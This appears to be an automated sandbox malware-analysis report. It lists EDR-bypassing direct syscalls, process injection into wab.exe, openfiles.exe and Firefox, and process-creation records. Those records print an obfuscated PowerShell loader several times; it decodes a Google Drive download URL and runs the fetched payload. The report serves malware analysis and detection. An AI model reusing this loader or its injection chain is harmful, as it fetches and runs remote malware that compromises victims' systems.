        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024C5ED mov eax, dword ptr fs:[00000030h]12_2_2024C5ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024C5ED mov eax, dword ptr fs:[00000030h]12_2_2024C5ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h]12_2_202315F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h]12_2_202315F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h]12_2_202315F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h]12_2_202315F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h]12_2_202315F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h]12_2_202315F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202455C0 mov eax, dword ptr fs:[00000030h]12_2_202455C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E55C9 mov eax, dword ptr fs:[00000030h]12_2_202E55C9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E5CF mov eax, dword ptr fs:[00000030h]12_2_2024E5CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E5CF mov eax, dword ptr fs:[00000030h]12_2_2024E5CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202165D0 mov eax, dword ptr fs:[00000030h]12_2_202165D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A5D0 mov eax, dword ptr fs:[00000030h]12_2_2024A5D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A5D0 mov eax, dword ptr fs:[00000030h]12_2_2024A5D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D5D0 mov eax, dword ptr fs:[00000030h]12_2_2028D5D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D5D0 mov ecx, dword ptr fs:[00000030h]12_2_2028D5D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h]12_2_202E35D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h]12_2_202E35D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h]12_2_202E35D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202395DA mov eax, dword ptr fs:[00000030h]12_2_202395DA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20246620 mov eax, dword ptr fs:[00000030h]12_2_20246620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20248620 mov eax, dword ptr fs:[00000030h]12_2_20248620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E627 mov eax, dword ptr fs:[00000030h]12_2_2022E627
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F626 mov eax, dword ptr fs:[00000030h]12_2_2020F626

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtQueryValueKey: Direct from: 0x77542BECJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtClose: Direct from: 0x77542B6C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtOpenKeyEx: Direct from: 0x77543C9CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\openfiles.exeThread register set: target process: 4944Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\openfiles.exeThread APC queued: target process: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A00000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 270F958Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st pJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st pJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr 